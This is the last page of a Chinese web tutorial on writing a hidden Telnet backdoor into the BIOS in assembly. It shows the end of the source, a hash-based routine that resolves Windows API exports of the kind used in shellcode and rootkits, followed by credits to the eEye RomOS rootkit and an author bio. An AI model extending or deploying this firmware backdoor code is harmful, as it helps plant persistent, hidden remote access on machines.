使用汇编编写BIOS中隐藏Telnet后门

      mov     edi,[ebp+20h]                                     ;edi -> IMAGE_EXPORT_DIRECTORY::AddressOfNames
      add     edi,ebx
      .while  ecx > 0
              dec     ecx
              mov     esi,[edi+ecx*4]
              add     esi,ebx                                   ;esi->API字符串在内存物理地址.

              push    edx
              .repeat
                      lodsb
                      sub     edx,eax
                      ror     edx,7
              .until  eax == 0                                  ;字符结束
              .if     edx == 0
                  pop    edx
                      .break
              .endif
                pop    edx
      .endw
      .if     ecx > 0
              mov     edx,[ebp+024h]
              add     edx,ebx                                   ;AddressofOrdinals
              mov     cx,[edx+ecx*2]
              mov     eax,[ebp+01ch]
              add     eax,ebx                                   ;AddressOfFunctions      
              add     ebx,[eax+ecx*4]
              mov     [esp+1Ch], ebx                            ;overwrite saved EAX with ptr to export
      .endif
      popad
      ret
;*********************************************************************************************
Code32End:                                  ;感谢: eEye RootKit RomOS开源项目,国外的技术我们永远学不完.
ProtectCode ends                        ;有不正确的地方,成松林很高兴各位指出这样我才会学到更多知识.
end   Code16Start

[关于作者]

姓名：成松林                 QQ:179641795                   Email:cheng_5103@126.com

本人对计算机的诸多技术都很有兴趣，常喜欢学习国外的开源项目，很佩服国外的计算机技术及知识。

本人学历：中专，       专业：计算机，        年龄：25，        工作：中专学业完成后留校工作。

废话：本人家景很穷，所以大学都未上成就工作，希望有志人士能教小弟赚钱。我文才很差，故文章中有语法及表达问题请大家多多谅解。

本文源自：翔宇亭——IT乐园（http://www.biye5u.com），转载请保留此信息！

上一页  [1] [2] [3]